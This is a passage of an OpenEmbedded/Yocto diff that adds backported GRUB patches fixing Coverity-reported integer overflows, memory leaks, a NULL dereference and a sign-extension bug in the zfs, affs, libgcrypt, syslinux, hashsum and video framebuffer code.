106- return grub_error (GRUB_ERR_BAD_FS, "filesystem is corrupt");
107+ err = grub_error (GRUB_ERR_BAD_FS, "filesystem is corrupt");
108+ break;
109 }
110
111 hdrsize = SA_HDR_SIZE (((sa_hdr_phys_t *) sahdrp));
112@@ -2974,7 +2985,8 @@ dnode_get_path (struct subvolume *subvol, const char *path_in, dnode_end_t *dn,
113 if (!path_buf)
114 {
115 grub_free (oldpathbuf);
116- return grub_errno;
117+ err = grub_errno;
118+ break;
119 }
120 grub_memcpy (path, sym_value, sym_sz);
121 path [sym_sz] = 0;
diff --git a/meta/recipes-bsp/grub/files/0023-zfs-Fix-possible-integer-overflows.patch b/meta/recipes-bsp/grub/files/0023-zfs-Fix-possible-integer-overflows.patch
new file mode 100644
index 0000000000..8df758b41f
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0023-zfs-Fix-possible-integer-overflows.patch
@@ -0,0 +1,56 @@
1From ec35d862f3567671048aa0d0d8ad1ded1fd25336 Mon Sep 17 00:00:00 2001
2From: Darren Kenny <darren.kenny@oracle.com>
3Date: Tue, 8 Dec 2020 22:17:04 +0000
4Subject: [PATCH] zfs: Fix possible integer overflows
5
6In all cases the problem is that the value being acted upon by
7a left-shift is a 32-bit number which is then being used in the
8context of a 64-bit number.
9
10To avoid overflow we ensure that the number being shifted is 64-bit
11before the shift is done.
12
13Fixes: CID 73684, CID 73695, CID 73764
14
15Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
16Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
17
18Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=302c12ff5714bc455949117c1c9548ccb324d55b]
19Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
20---
21 grub-core/fs/zfs/zfs.c | 8 ++++----
22 1 file changed, 4 insertions(+), 4 deletions(-)
23
24diff --git a/grub-core/fs/zfs/zfs.c b/grub-core/fs/zfs/zfs.c
25index 9087a72..b078ccc 100644
26--- a/grub-core/fs/zfs/zfs.c
27+++ b/grub-core/fs/zfs/zfs.c
28@@ -564,7 +564,7 @@ find_bestub (uberblock_phys_t * ub_array,
29 ubptr = (uberblock_phys_t *) ((grub_properly_aligned_t *) ub_array
30 + ((i << ub_shift)
31 / sizeof (grub_properly_aligned_t)));
32- err = uberblock_verify (ubptr, offset, 1 << ub_shift);
33+ err = uberblock_verify (ubptr, offset, (grub_size_t) 1 << ub_shift);
34 if (err)
35 {
36 grub_errno = GRUB_ERR_NONE;
37@@ -1543,7 +1543,7 @@ read_device (grub_uint64_t offset, struct grub_zfs_device_desc *desc,
38
39 high = grub_divmod64 ((offset >> desc->ashift) + c,
40 desc->n_children, &devn);
41- csize = bsize << desc->ashift;
42+ csize = (grub_size_t) bsize << desc->ashift;
43 if (csize > len)
44 csize = len;
45
46@@ -1635,8 +1635,8 @@ read_device (grub_uint64_t offset, struct grub_zfs_device_desc *desc,
47
48 while (len > 0)
49 {
50- grub_size_t csize;
51- csize = ((s / (desc->n_children - desc->nparity))
52+ grub_size_t csize = s;
53+ csize = ((csize / (desc->n_children - desc->nparity))
54 << desc->ashift);
55 if (csize > len)
56 csize = len;
diff --git a/meta/recipes-bsp/grub/files/0024-zfsinfo-Correct-a-check-for-error-allocating-memory.patch b/meta/recipes-bsp/grub/files/0024-zfsinfo-Correct-a-check-for-error-allocating-memory.patch
new file mode 100644
index 0000000000..555dc19168
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0024-zfsinfo-Correct-a-check-for-error-allocating-memory.patch
@@ -0,0 +1,35 @@
1From b085da8efda9b81f94aa197ee045226563554fdf Mon Sep 17 00:00:00 2001
2From: Darren Kenny <darren.kenny@oracle.com>
3Date: Thu, 26 Nov 2020 10:56:45 +0000
4Subject: [PATCH] zfsinfo: Correct a check for error allocating memory
5
6While arguably the check for grub_errno is correct, we should really be
7checking the return value from the function since it is always possible
8that grub_errno was set elsewhere, making this code behave incorrectly.
9
10Fixes: CID 73668
11
12Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
13Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
14
15Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=7aab03418ec6a9b991aa44416cb2585aff4e7972]
16Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
17---
18 grub-core/fs/zfs/zfsinfo.c | 4 ++--
19 1 file changed, 2 insertions(+), 2 deletions(-)
20
21diff --git a/grub-core/fs/zfs/zfsinfo.c b/grub-core/fs/zfs/zfsinfo.c
22index c8a28ac..bf29180 100644
23--- a/grub-core/fs/zfs/zfsinfo.c
24+++ b/grub-core/fs/zfs/zfsinfo.c
25@@ -358,8 +358,8 @@ grub_cmd_zfs_bootfs (grub_command_t cmd __attribute__ ((unused)), int argc,
26 return grub_error (GRUB_ERR_BAD_ARGUMENT, N_("one argument expected"));
27
28 devname = grub_file_get_device_name (args[0]);
29- if (grub_errno)
30- return grub_errno;
31+ if (devname == NULL)
32+ return GRUB_ERR_OUT_OF_MEMORY;
33
34 dev = grub_device_open (devname);
35 grub_free (devname);
diff --git a/meta/recipes-bsp/grub/files/0025-affs-Fix-memory-leaks.patch b/meta/recipes-bsp/grub/files/0025-affs-Fix-memory-leaks.patch
new file mode 100644
index 0000000000..435130516c
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0025-affs-Fix-memory-leaks.patch
@@ -0,0 +1,82 @@
1From 929c2ce8214c53cb95abff57a89556cd18444097 Mon Sep 17 00:00:00 2001
2From: Darren Kenny <darren.kenny@oracle.com>
3Date: Thu, 26 Nov 2020 12:48:07 +0000
4Subject: [PATCH] affs: Fix memory leaks
5
6The node structure reference is being allocated but not freed if it
7reaches the end of the function. If any of the hooks had returned
8a non-zero value, then node would have been copied in to the context
9reference, but otherwise node is not stored and should be freed.
10
11Similarly, the call to grub_affs_create_node() replaces the allocated
12memory in node with a newly allocated structure, leaking the existing
13memory pointed by node.
14
15Finally, when dir->parent is set, then we again replace node with newly
16allocated memory, which seems unnecessary when we copy in the values
17from dir->parent immediately after.
18
19Fixes: CID 73759
20
21Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
22Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
23
24Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=178ac5107389f8e5b32489d743d6824a5ebf342a]
25Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
26---
27 grub-core/fs/affs.c | 18 ++++++++----------
28 1 file changed, 8 insertions(+), 10 deletions(-)
29
30diff --git a/grub-core/fs/affs.c b/grub-core/fs/affs.c
31index 220b371..230e26a 100644
32--- a/grub-core/fs/affs.c
33+++ b/grub-core/fs/affs.c
34@@ -400,12 +400,12 @@ grub_affs_iterate_dir (grub_fshelp_node_t dir,
35 {
36 unsigned int i;
37 struct grub_affs_file file;
38- struct grub_fshelp_node *node = 0;
39+ struct grub_fshelp_node *node, *orig_node;
40 struct grub_affs_data *data = dir->data;
41 grub_uint32_t *hashtable;
42
43 /* Create the directory entries for `.' and `..'. */
44- node = grub_zalloc (sizeof (*node));
45+ node = orig_node = grub_zalloc (sizeof (*node));
46 if (!node)
47 return 1;
48
49@@ -414,9 +414,6 @@ grub_affs_iterate_dir (grub_fshelp_node_t dir,
50 return 1;
51 if (dir->parent)
52 {
53- node = grub_zalloc (sizeof (*node));
54- if (!node)
55- return 1;
56 *node = *dir->parent;
57 if (hook ("..", GRUB_FSHELP_DIR, node, hook_data))
58 return 1;
59@@ -456,17 +453,18 @@ grub_affs_iterate_dir (grub_fshelp_node_t dir,
60
61 if (grub_affs_create_node (dir, hook, hook_data, &node, &hashtable,
62 next, &file))
63- return 1;
64+ {
65+ /* Node has been replaced in function. */
66+ grub_free (orig_node);
67+ return 1;
68+ }
69
70 next = grub_be_to_cpu32 (file.next);
71 }
72 }
73
74- grub_free (hashtable);
75- return 0;
76-
77 fail:
78- grub_free (node);
79+ grub_free (orig_node);
80 grub_free (hashtable);
81 return 0;
82 }
diff --git a/meta/recipes-bsp/grub/files/0026-libgcrypt-mpi-Fix-possible-unintended-sign-extension.patch b/meta/recipes-bsp/grub/files/0026-libgcrypt-mpi-Fix-possible-unintended-sign-extension.patch
new file mode 100644
index 0000000000..f500f1a296
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0026-libgcrypt-mpi-Fix-possible-unintended-sign-extension.patch
@@ -0,0 +1,36 @@
1From 9b16d7bcad1c7fea7f26eb2fb3af1a5ca70ba34e Mon Sep 17 00:00:00 2001
2From: Darren Kenny <darren.kenny@oracle.com>
3Date: Tue, 3 Nov 2020 16:43:37 +0000
4Subject: [PATCH] libgcrypt/mpi: Fix possible unintended sign extension
5
6The array of unsigned char gets promoted to a signed 32-bit int before
7it is finally promoted to a size_t. There is the possibility that this
8may result in the signed-bit being set for the intermediate signed
932-bit int. We should ensure that the promotion is to the correct type
10before we bitwise-OR the values.
11
12Fixes: CID 96697
13
14Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
15Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
16
17Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=e8814c811132a70f9b55418f7567378a34ad3883]
18Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
19
20---
21 grub-core/lib/libgcrypt/mpi/mpicoder.c | 2 +-
22 1 file changed, 1 insertion(+), 1 deletion(-)
23
24diff --git a/grub-core/lib/libgcrypt/mpi/mpicoder.c b/grub-core/lib/libgcrypt/mpi/mpicoder.c
25index a3435ed..7ecad27 100644
26--- a/grub-core/lib/libgcrypt/mpi/mpicoder.c
27+++ b/grub-core/lib/libgcrypt/mpi/mpicoder.c
28@@ -458,7 +458,7 @@ gcry_mpi_scan (struct gcry_mpi **ret_mpi, enum gcry_mpi_format format,
29 if (len && len < 4)
30 return gcry_error (GPG_ERR_TOO_SHORT);
31
32- n = (s[0] << 24 | s[1] << 16 | s[2] << 8 | s[3]);
33+ n = ((size_t)s[0] << 24 | (size_t)s[1] << 16 | (size_t)s[2] << 8 | (size_t)s[3]);
34 s += 4;
35 if (len)
36 len -= 4;
diff --git a/meta/recipes-bsp/grub/files/0027-libgcrypt-mpi-Fix-possible-NULL-dereference.patch b/meta/recipes-bsp/grub/files/0027-libgcrypt-mpi-Fix-possible-NULL-dereference.patch
new file mode 100644
index 0000000000..08299d021e
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0027-libgcrypt-mpi-Fix-possible-NULL-dereference.patch
@@ -0,0 +1,33 @@
1From d26c8771293637b0465f2cb67d97cb58bacc62da Mon Sep 17 00:00:00 2001
2From: Darren Kenny <darren.kenny@oracle.com>
3Date: Thu, 26 Nov 2020 10:41:54 +0000
4Subject: [PATCH] libgcrypt/mpi: Fix possible NULL dereference
5
6The code in gcry_mpi_scan() assumes that buffer is not NULL, but there
7is no explicit check for that, so we add one.
8
9Fixes: CID 73757
10
11Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
12Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
13
14Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=ae0f3fabeba7b393113d5dc185b6aff9b728136d]
15Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
16---
17 grub-core/lib/libgcrypt/mpi/mpicoder.c | 3 +++
18 1 file changed, 3 insertions(+)
19
20diff --git a/grub-core/lib/libgcrypt/mpi/mpicoder.c b/grub-core/lib/libgcrypt/mpi/mpicoder.c
21index 7ecad27..6fe3891 100644
22--- a/grub-core/lib/libgcrypt/mpi/mpicoder.c
23+++ b/grub-core/lib/libgcrypt/mpi/mpicoder.c
24@@ -379,6 +379,9 @@ gcry_mpi_scan (struct gcry_mpi **ret_mpi, enum gcry_mpi_format format,
25 unsigned int len;
26 int secure = (buffer && gcry_is_secure (buffer));
27
28+ if (!buffer)
29+ return gcry_error (GPG_ERR_INV_ARG);
30+
31 if (format == GCRYMPI_FMT_SSH)
32 len = 0;
33 else
diff --git a/meta/recipes-bsp/grub/files/0028-syslinux-Fix-memory-leak-while-parsing.patch b/meta/recipes-bsp/grub/files/0028-syslinux-Fix-memory-leak-while-parsing.patch
new file mode 100644
index 0000000000..d8c21d88f7
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0028-syslinux-Fix-memory-leak-while-parsing.patch
@@ -0,0 +1,43 @@
1From ea12feb69b6af93c7e2fa03df7ac3bd1f4edd599 Mon Sep 17 00:00:00 2001
2From: Darren Kenny <darren.kenny@oracle.com>
3Date: Thu, 26 Nov 2020 15:31:53 +0000
4Subject: [PATCH] syslinux: Fix memory leak while parsing
5
6In syslinux_parse_real() the 2 points where return is being called
7didn't release the memory stored in buf which is no longer required.
8
9Fixes: CID 176634
10
11Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
12Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
13
14Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=95bc016dba94cab3d398dd74160665915cd08ad6]
15Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
16---
17 grub-core/lib/syslinux_parse.c | 6 +++++-
18 1 file changed, 5 insertions(+), 1 deletion(-)
19
20diff --git a/grub-core/lib/syslinux_parse.c b/grub-core/lib/syslinux_parse.c
21index 4afa992..3acc6b4 100644
22--- a/grub-core/lib/syslinux_parse.c
23+++ b/grub-core/lib/syslinux_parse.c
24@@ -737,7 +737,10 @@ syslinux_parse_real (struct syslinux_menu *menu)
25 && grub_strncasecmp ("help", ptr3, ptr4 - ptr3) == 0))
26 {
27 if (helptext (ptr5, file, menu))
28- return 1;
29+ {
30+ grub_free (buf);
31+ return 1;
32+ }
33 continue;
34 }
35
36@@ -757,6 +760,7 @@ syslinux_parse_real (struct syslinux_menu *menu)
37 }
38 fail:
39 grub_file_close (file);
40+ grub_free (buf);
41 return err;
42 }
43
diff --git a/meta/recipes-bsp/grub/files/0029-normal-completion-Fix-leaking-of-memory-when-process.patch b/meta/recipes-bsp/grub/files/0029-normal-completion-Fix-leaking-of-memory-when-process.patch
new file mode 100644
index 0000000000..8a26e5bc5b
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0029-normal-completion-Fix-leaking-of-memory-when-process.patch
@@ -0,0 +1,52 @@
1From 2367049d2021e00d82d19cee923e06a4b04ebc30 Mon Sep 17 00:00:00 2001
2From: Darren Kenny <darren.kenny@oracle.com>
3Date: Fri, 4 Dec 2020 18:56:48 +0000
4Subject: [PATCH] normal/completion: Fix leaking of memory when processing a
5 completion
6
7It is possible for the code to reach the end of the function without
8freeing the memory allocated to argv and argc still to be 0.
9
10We should always call grub_free(argv). The grub_free() will handle
11a NULL argument correctly if it reaches that code without the memory
12being allocated.
13
14Fixes: CID 96672
15
16Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
17Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
18
19Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=9213575b7a95b514bce80be5964a28d407d7d56d]
20Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
21---
22 grub-core/normal/completion.c | 10 ++++------
23 1 file changed, 4 insertions(+), 6 deletions(-)
24
25diff --git a/grub-core/normal/completion.c b/grub-core/normal/completion.c
26index 5961028..46e473c 100644
27--- a/grub-core/normal/completion.c
28+++ b/grub-core/normal/completion.c
29@@ -400,8 +400,8 @@ char *
30 grub_normal_do_completion (char *buf, int *restore,
31 void (*hook) (const char *, grub_completion_type_t, int))
32 {
33- int argc;
34- char **argv;
35+ int argc = 0;
36+ char **argv = NULL;
37
38 /* Initialize variables. */
39 match = 0;
40@@ -516,10 +516,8 @@ grub_normal_do_completion (char *buf, int *restore,
41
42 fail:
43 if (argc != 0)
44- {
45- grub_free (argv[0]);
46- grub_free (argv);
47- }
48+ grub_free (argv[0]);
49+ grub_free (argv);
50 grub_free (match);
51 grub_errno = GRUB_ERR_NONE;
52
diff --git a/meta/recipes-bsp/grub/files/0030-commands-hashsum-Fix-a-memory-leak.patch b/meta/recipes-bsp/grub/files/0030-commands-hashsum-Fix-a-memory-leak.patch
new file mode 100644
index 0000000000..e34a19e12c
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0030-commands-hashsum-Fix-a-memory-leak.patch
@@ -0,0 +1,56 @@
1From b136fa14d26d1833ffcb852f86e65da5960cfb99 Mon Sep 17 00:00:00 2001
2From: Chris Coulson <chris.coulson@canonical.com>
3Date: Tue, 1 Dec 2020 23:41:24 +0000
4Subject: [PATCH] commands/hashsum: Fix a memory leak
5
6check_list() uses grub_file_getline(), which allocates a buffer.
7If the hash list file contains invalid lines, the function leaks
8this buffer when it returns an error.
9
10Fixes: CID 176635
11
12Signed-off-by: Chris Coulson <chris.coulson@canonical.com>
13Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
14
15Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=8b6f528e52e18b7a69f90b8dc3671d7b1147d9f3]
16Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
17---
18 grub-core/commands/hashsum.c | 15 ++++++++++++---
19 1 file changed, 12 insertions(+), 3 deletions(-)
20
21diff --git a/grub-core/commands/hashsum.c b/grub-core/commands/hashsum.c
22index 456ba90..b8a22b0 100644
23--- a/grub-core/commands/hashsum.c
24+++ b/grub-core/commands/hashsum.c
25@@ -128,11 +128,17 @@ check_list (const gcry_md_spec_t *hash, const char *hashfilename,
26 high = hextoval (*p++);
27 low = hextoval (*p++);
28 if (high < 0 || low < 0)
29- return grub_error (GRUB_ERR_BAD_FILE_TYPE, "invalid hash list");
30+ {
31+ grub_free (buf);
32+ return grub_error (GRUB_ERR_BAD_FILE_TYPE, "invalid hash list");
33+ }
34 expected[i] = (high << 4) | low;
35 }
36 if ((p[0] != ' ' && p[0] != '\t') || (p[1] != ' ' && p[1] != '\t'))
37- return grub_error (GRUB_ERR_BAD_FILE_TYPE, "invalid hash list");
38+ {
39+ grub_free (buf);
40+ return grub_error (GRUB_ERR_BAD_FILE_TYPE, "invalid hash list");
41+ }
42 p += 2;
43 if (prefix)
44 {
45@@ -140,7 +146,10 @@ check_list (const gcry_md_spec_t *hash, const char *hashfilename,
46
47 filename = grub_xasprintf ("%s/%s", prefix, p);
48 if (!filename)
49- return grub_errno;
50+ {
51+ grub_free (buf);
52+ return grub_errno;
53+ }
54 file = grub_file_open (filename, GRUB_FILE_TYPE_TO_HASH
55 | (!uncompress ? GRUB_FILE_TYPE_NO_DECOMPRESS
56 : GRUB_FILE_TYPE_NONE));
diff --git a/meta/recipes-bsp/grub/files/0031-video-efi_gop-Remove-unnecessary-return-value-of-gru.patch b/meta/recipes-bsp/grub/files/0031-video-efi_gop-Remove-unnecessary-return-value-of-gru.patch
new file mode 100644
index 0000000000..7e4e951245
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0031-video-efi_gop-Remove-unnecessary-return-value-of-gru.patch
@@ -0,0 +1,94 @@
1From 2a1e5659763790201a342f8a897c8c9d8d91b1cc Mon Sep 17 00:00:00 2001
2From: Darren Kenny <darren.kenny@oracle.com>
3Date: Tue, 8 Dec 2020 21:14:31 +0000
4Subject: [PATCH] video/efi_gop: Remove unnecessary return value of
5 grub_video_gop_fill_mode_info()
6
7The return value of grub_video_gop_fill_mode_info() is never able to be
8anything other than GRUB_ERR_NONE. So, rather than continue to return
9a value and checking it each time, it is more correct to redefine the
10function to not return anything and remove checks of its return value
11altogether.
12
13Fixes: CID 96701
14
15Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
16Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
17
18Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=fc5951d3b1616055ef81a019a5affc09d13344d0]
19Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
20---
21 grub-core/video/efi_gop.c | 25 ++++++-------------------
22 1 file changed, 6 insertions(+), 19 deletions(-)
23
24diff --git a/grub-core/video/efi_gop.c b/grub-core/video/efi_gop.c
25index 7f9d1c2..db2ee98 100644
26--- a/grub-core/video/efi_gop.c
27+++ b/grub-core/video/efi_gop.c
28@@ -227,7 +227,7 @@ grub_video_gop_fill_real_mode_info (unsigned mode,
29 return GRUB_ERR_NONE;
30 }
31
32-static grub_err_t
33+static void
34 grub_video_gop_fill_mode_info (unsigned mode,
35 struct grub_efi_gop_mode_info *in,
36 struct grub_video_mode_info *out)
37@@ -252,8 +252,6 @@ grub_video_gop_fill_mode_info (unsigned mode,
38 out->blit_format = GRUB_VIDEO_BLIT_FORMAT_BGRA_8888;
39 out->mode_type |= (GRUB_VIDEO_MODE_TYPE_DOUBLE_BUFFERED
40 | GRUB_VIDEO_MODE_TYPE_UPDATING_SWAP);
41-
42- return GRUB_ERR_NONE;
43 }
44
45 static int
46@@ -266,7 +264,6 @@ grub_video_gop_iterate (int (*hook) (const struct grub_video_mode_info *info, vo
47 grub_efi_uintn_t size;
48 grub_efi_status_t status;
49 struct grub_efi_gop_mode_info *info = NULL;
50- grub_err_t err;
51 struct grub_video_mode_info mode_info;
52
53 status = efi_call_4 (gop->query_mode, gop, mode, &size, &info);
54@@ -277,12 +274,7 @@ grub_video_gop_iterate (int (*hook) (const struct grub_video_mode_info *info, vo
55 continue;
56 }
57
58- err = grub_video_gop_fill_mode_info (mode, info, &mode_info);
59- if (err)
60- {
61- grub_errno = GRUB_ERR_NONE;
62- continue;
63- }
64+ grub_video_gop_fill_mode_info (mode, info, &mode_info);
65 if (hook (&mode_info, hook_arg))
66 return 1;
67 }
68@@ -466,13 +458,8 @@ grub_video_gop_setup (unsigned int width, unsigned int height,
69
70 info = gop->mode->info;
71
72- err = grub_video_gop_fill_mode_info (gop->mode->mode, info,
73- &framebuffer.mode_info);
74- if (err)
75- {
76- grub_dprintf ("video", "GOP: couldn't fill mode info\n");
77- return err;
78- }
79+ grub_video_gop_fill_mode_info (gop->mode->mode, info,
80+ &framebuffer.mode_info);
81
82 framebuffer.ptr = (void *) (grub_addr_t) gop->mode->fb_base;
83 framebuffer.offscreen
84@@ -486,8 +473,8 @@ grub_video_gop_setup (unsigned int width, unsigned int height,
85 {
86 grub_dprintf ("video", "GOP: couldn't allocate shadow\n");
87 grub_errno = 0;
88- err = grub_video_gop_fill_mode_info (gop->mode->mode, info,
89- &framebuffer.mode_info);
90+ grub_video_gop_fill_mode_info (gop->mode->mode, info,
91+ &framebuffer.mode_info);
92 buffer = framebuffer.ptr;
93 }
94
diff --git a/meta/recipes-bsp/grub/files/0032-video-fb-fbfill-Fix-potential-integer-overflow.patch b/meta/recipes-bsp/grub/files/0032-video-fb-fbfill-Fix-potential-integer-overflow.patch
new file mode 100644
index 0000000000..8165ea3f71
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0032-video-fb-fbfill-Fix-potential-integer-overflow.patch
@@ -0,0 +1,78 @@
1From 99ecf5a44b99d529a6405fe276bedcefa3657a0a Mon Sep 17 00:00:00 2001
2From: Darren Kenny <darren.kenny@oracle.com>
3Date: Wed, 4 Nov 2020 15:10:51 +0000
4Subject: [PATCH] video/fb/fbfill: Fix potential integer overflow
5
6The multiplication of 2 unsigned 32-bit integers may overflow before
7promotion to unsigned 64-bit. We should ensure that the multiplication
8is done with overflow detection. Additionally, use grub_sub() for
9subtraction.
10
11Fixes: CID 73640, CID 73697, CID 73702, CID 73823
12
13Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
14Signed-off-by: Marco A Benatto <mbenatto@redhat.com>
15Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
16
17Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=7ce3259f67ac2cd93acb0ec0080c24b3b69e66c6]
18Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
19---
20 grub-core/video/fb/fbfill.c | 17 +++++++++++++----
21 1 file changed, 13 insertions(+), 4 deletions(-)
22
23diff --git a/grub-core/video/fb/fbfill.c b/grub-core/video/fb/fbfill.c
24index 11816d0..a37acd1 100644
25--- a/grub-core/video/fb/fbfill.c
26+++ b/grub-core/video/fb/fbfill.c
27@@ -31,6 +31,7 @@
28 #include <grub/fbfill.h>
29 #include <grub/fbutil.h>
30 #include <grub/types.h>
31+#include <grub/safemath.h>
32 #include <grub/video.h>
33
34 /* Generic filler that works for every supported mode. */
35@@ -61,7 +62,9 @@ grub_video_fbfill_direct32 (struct grub_video_fbblit_info *dst,
36
37 /* Calculate the number of bytes to advance from the end of one line
38 to the beginning of the next line. */
39- rowskip = dst->mode_info->pitch - dst->mode_info->bytes_per_pixel * width;
40+ if (grub_mul (dst->mode_info->bytes_per_pixel, width, &rowskip) ||
41+ grub_sub (dst->mode_info->pitch, rowskip, &rowskip))
42+ return;
43
44 /* Get the start address. */
45 dstptr = grub_video_fb_get_video_ptr (dst, x, y);
46@@ -98,7 +101,9 @@ grub_video_fbfill_direct24 (struct grub_video_fbblit_info *dst,
47 #endif
48 /* Calculate the number of bytes to advance from the end of one line
49 to the beginning of the next line. */
50- rowskip = dst->mode_info->pitch - dst->mode_info->bytes_per_pixel * width;
51+ if (grub_mul (dst->mode_info->bytes_per_pixel, width, &rowskip) ||
52+ grub_sub (dst->mode_info->pitch, rowskip, &rowskip))
53+ return;
54
55 /* Get the start address. */
56 dstptr = grub_video_fb_get_video_ptr (dst, x, y);
57@@ -131,7 +136,9 @@ grub_video_fbfill_direct16 (struct grub_video_fbblit_info *dst,
58
59 /* Calculate the number of bytes to advance from the end of one line
60 to the beginning of the next line. */
61- rowskip = (dst->mode_info->pitch - dst->mode_info->bytes_per_pixel * width);
62+ if (grub_mul (dst->mode_info->bytes_per_pixel, width, &rowskip) ||
63+ grub_sub (dst->mode_info->pitch, rowskip, &rowskip))
64+ return;
65
66 /* Get the start address. */
67 dstptr = grub_video_fb_get_video_ptr (dst, x, y);
68@@ -161,7 +168,9 @@ grub_video_fbfill_direct8 (struct grub_video_fbblit_info *dst,
69
70 /* Calculate the number of bytes to advance from the end of one line
71 to the beginning of the next line. */
72- rowskip = dst->mode_info->pitch - dst->mode_info->bytes_per_pixel * width;
73+ if (grub_mul (dst->mode_info->bytes_per_pixel, width, &rowskip) ||
74+ grub_sub (dst->mode_info->pitch, rowskip, &rowskip))
75+ return;
76
77 /* Get the start address. */
78 dstptr = grub_video_fb_get_video_ptr (dst, x, y);
diff --git a/meta/recipes-bsp/grub/files/0033-video-fb-video_fb-Fix-multiple-integer-overflows.patch b/meta/recipes-bsp/grub/files/0033-video-fb-video_fb-Fix-multiple-integer-overflows.patch
new file mode 100644
index 0000000000..544e7f31ae
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0033-video-fb-video_fb-Fix-multiple-integer-overflows.patch
@@ -0,0 +1,104 @@
1From 69b91f7466a5ad5fb85039a5b4118efb77ad6347 Mon Sep 17 00:00:00 2001
2From: Darren Kenny <darren.kenny@oracle.com>
3Date: Wed, 4 Nov 2020 14:43:44 +0000
4Subject: [PATCH] video/fb/video_fb: Fix multiple integer overflows
5
6The calculation of the unsigned 64-bit value is being generated by
7multiplying 2, signed or unsigned, 32-bit integers which may overflow
8before promotion to unsigned 64-bit. Fix all of them.
9
10Fixes: CID 73703, CID 73767, CID 73833
11
12Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
13Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
14
15Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=08e098b1dbf01e96376f594b337491bc4cfa48dd]
16Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
17---
18 grub-core/video/fb/video_fb.c | 52 ++++++++++++++++++++++++-----------
19 1 file changed, 36 insertions(+), 16 deletions(-)
20
21diff --git a/grub-core/video/fb/video_fb.c b/grub-core/video/fb/video_fb.c
22index 1a602c8..1c9a138 100644
23--- a/grub-core/video/fb/video_fb.c
24+++ b/grub-core/video/fb/video_fb.c
25@@ -25,6 +25,7 @@
26 #include <grub/fbutil.h>
27 #include <grub/bitmap.h>
28 #include <grub/dl.h>
29+#include <grub/safemath.h>
30
31 GRUB_MOD_LICENSE ("GPLv3+");
32
33@@ -1417,15 +1418,23 @@ doublebuf_blit_update_screen (void)
34 {
35 if (framebuffer.current_dirty.first_line
36 <= framebuffer.current_dirty.last_line)
37- grub_memcpy ((char *) framebuffer.pages[0]
38- + framebuffer.current_dirty.first_line
39- * framebuffer.back_target->mode_info.pitch,
40- (char *) framebuffer.back_target->data
41- + framebuffer.current_dirty.first_line
42- * framebuffer.back_target->mode_info.pitch,
43- framebuffer.back_target->mode_info.pitch
44- * (framebuffer.current_dirty.last_line
45- - framebuffer.current_dirty.first_line));
46+ {
47+ grub_size_t copy_size;
48+
49+ if (grub_sub (framebuffer.current_dirty.last_line,
50+ framebuffer.current_dirty.first_line, &copy_size) ||
51+ grub_mul (framebuffer.back_target->mode_info.pitch, copy_size, &copy_size))
52+ {
53+ /* Shouldn't happen, but if it does we've a bug. */
54+ return GRUB_ERR_BUG;
55+ }
56+
57+ grub_memcpy ((char *) framebuffer.pages[0] + framebuffer.current_dirty.first_line *
58+ framebuffer.back_target->mode_info.pitch,
59+ (char *) framebuffer.back_target->data + framebuffer.current_dirty.first_line *
60+ framebuffer.back_target->mode_info.pitch,
61+ copy_size);
62+ }
63 framebuffer.current_dirty.first_line
64 = framebuffer.back_target->mode_info.height;
65 framebuffer.current_dirty.last_line = 0;
66@@ -1439,7 +1448,7 @@ grub_video_fb_doublebuf_blit_init (struct grub_video_fbrender_target **back,
67 volatile void *framebuf)
68 {
69 grub_err_t err;
